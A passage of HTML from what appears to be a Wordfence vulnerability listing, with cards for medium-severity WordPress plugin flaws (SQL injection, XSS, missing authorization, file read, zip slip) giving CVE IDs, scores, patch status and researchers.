<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fc167f44-4b1c-4597-9c9b-61064044bcdb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3cc6aa06-ab2a-4d5c-bbbe-4c19722ccc53" target="_blank" rel="noopener">WPBot &lt;= 8.5.9 &#8211; Missing Authorization to Unauthenticated Email Relay via wpcs_send_email AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16774" target="_blank" rel="noopener noreferrer">							CVE-2026-16774						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, AI Services</a> <span class="wfvr-software-slug">[chatbot]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3cc6aa06-ab2a-4d5c-bbbe-4c19722ccc53" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5463548c-22bd-4645-a94d-ee8c6a236337" target="_blank" rel="noopener">WPBot &lt;= 8.5.9 &#8211; Unauthenticated Sensitive Information Exposure in &#8216;wpbot_send_email_transcript&#8217; AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16773" target="_blank" rel="noopener noreferrer">							CVE-2026-16773						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, AI Services</a> <span class="wfvr-software-slug">[chatbot]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5463548c-22bd-4645-a94d-ee8c6a236337" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bfef0be2-b73d-43f9-a3bc-f61846fa0704" target="_blank" rel="noopener">Xendit Payment &lt;= 7.1.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66473" target="_blank" rel="noopener noreferrer">							CVE-2026-66473						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-xendit-virtual-accounts" target="_blank" rel="noopener">Xendit Payment</a> <span class="wfvr-software-slug">[woo-xendit-virtual-accounts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c10dbe06f111ce709fdc2628e94ac9a1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c10dbe06f111ce709fdc2628e94ac9a1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener">Mitchell</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bfef0be2-b73d-43f9-a3bc-f61846fa0704" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55ba8d6a-df38-4e24-afa4-6f82cb318c6b" target="_blank" rel="noopener">Shortcodify &lt;= 1.4.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;name&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">5.0</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.0 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11598" target="_blank" rel="noopener noreferrer">							CVE-2026-11598						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shortcodify" target="_blank" rel="noopener">Shortcodify</a> <span class="wfvr-software-slug">[shortcodify]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaki-zaki" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/336a4835171563e9c198b2d4dee1fa34.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="336a4835171563e9c198b2d4dee1fa34"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaki-zaki" target="_blank" rel="noopener">zakaria</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55ba8d6a-df38-4e24-afa4-6f82cb318c6b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3930614d-1b3a-4ca2-9d17-b2e905330fe9" target="_blank" rel="noopener">Google Review Slider &lt;= 18.4 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66427" target="_blank" rel="noopener noreferrer">							CVE-2026-66427						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-places-review-slider" target="_blank" rel="noopener">WP Google Review Slider</a> <span class="wfvr-software-slug">[wp-google-places-review-slider]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3930614d-1b3a-4ca2-9d17-b2e905330fe9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83455de5-4fb2-4782-8063-646d3daf29e5" target="_blank" rel="noopener">GSheetConnector &lt;= 5.2.1 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;s&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16614" target="_blank" rel="noopener noreferrer">							CVE-2026-16614						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf7-google-sheets-connector" target="_blank" rel="noopener">GSheetConnector – Contact Form 7 Google Sheets Connector &amp; Save CF7 Entries to Database</a> <span class="wfvr-software-slug">[cf7-google-sheets-connector]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83455de5-4fb2-4782-8063-646d3daf29e5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e4cff1c-6a01-4725-9e37-f48b5de16d9b" target="_blank" rel="noopener">Icegram Mailer &lt;= 1.0.12 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;fields&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15951" target="_blank" rel="noopener noreferrer">							CVE-2026-15951						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/icegram-mailer" target="_blank" rel="noopener">Icegram Mailer – Reliable Email Deliverability, No-code SMTP Replacement &amp; Email logs</a> <span class="wfvr-software-slug">[icegram-mailer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e4cff1c-6a01-4725-9e37-f48b5de16d9b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ccd1314-b9b9-4f63-820c-2817a4932ee8" target="_blank" rel="noopener">Kirki &lt;= 6.0.13 &#8211; Authenticated (Editor+) Path Traversal to Arbitrary File Write (Zip Slip)</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15601" target="_blank" rel="noopener noreferrer">							CVE-2026-15601						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cuokon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/482f7d5936d2268f1f9cdaa84f3867db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="482f7d5936d2268f1f9cdaa84f3867db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cuokon" target="_blank" rel="noopener">cuokon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ccd1314-b9b9-4f63-820c-2817a4932ee8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb23bc2e-4484-46d5-b46e-5e43e5a1bf12" target="_blank" rel="noopener">Pinpoint Booking System &lt;= 2.9.9.6.9 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;field&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15403" target="_blank" rel="noopener noreferrer">							CVE-2026-15403						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-system" target="_blank" rel="noopener">Pinpoint Booking System – Version 2</a> <span class="wfvr-software-slug">[booking-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb23bc2e-4484-46d5-b46e-5e43e5a1bf12" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bed2ada9-af3d-479e-8ae4-11eaad0b3842" target="_blank" rel="noopener">ShopLentor &lt;= 3.4.5 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;orderby&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16811" target="_blank" rel="noopener noreferrer">							CVE-2026-16811						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons" target="_blank" rel="noopener">ShopLentor – All-in-One WooCommerce Growth &amp; Store Enhancement Plugin</a> <span class="wfvr-software-slug">[woolentor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bed2ada9-af3d-479e-8ae4-11eaad0b3842" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8440c1d-2a02-42b4-8fc5-42e5a107c0af" target="_blank" rel="noopener">SMS Alert &lt;= 3.9.7 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15671" target="_blank" rel="noopener noreferrer">							CVE-2026-15671						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8440c1d-2a02-42b4-8fc5-42e5a107c0af" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bcae549f-6a10-4b0d-a8d1-5dcc83e1f2e5" target="_blank" rel="noopener">SMS Alert &lt;= 3.9.7 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;orderby&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15670" target="_blank" rel="noopener noreferrer">							CVE-2026-15670						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bcae549f-6a10-4b0d-a8d1-5dcc83e1f2e5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cfefcc38-764d-4dd9-b098-cdcad475d634" target="_blank" rel="noopener">SpeedyCache &lt;= 1.3.8 &#8211; Authenticated (Administrator+) Arbitrary File Read</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5114" target="_blank" rel="noopener noreferrer">							CVE-2026-5114						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/speedycache" target="_blank" rel="noopener">SpeedyCache – Cache, Optimization, Performance</a> <span class="wfvr-software-slug">[speedycache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chiao-lin-yu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/808cc96dd7906a4eb995e7f5e1d17296.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="808cc96dd7906a4eb995e7f5e1d17296"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chiao-lin-yu" target="_blank" rel="noopener">Chiao-Lin Yu (Steven Meow)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cfefcc38-764d-4dd9-b098-cdcad475d634" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d637d7b-7a47-40db-a931-ec7ca723dfab" target="_blank" rel="noopener">Tutor LMS &lt;= 4.0.1 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;coupon_code&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15444" target="_blank" rel="noopener noreferrer">							CVE-2026-15444						</a>					</strong>
				</div>
<div class="patched-status">
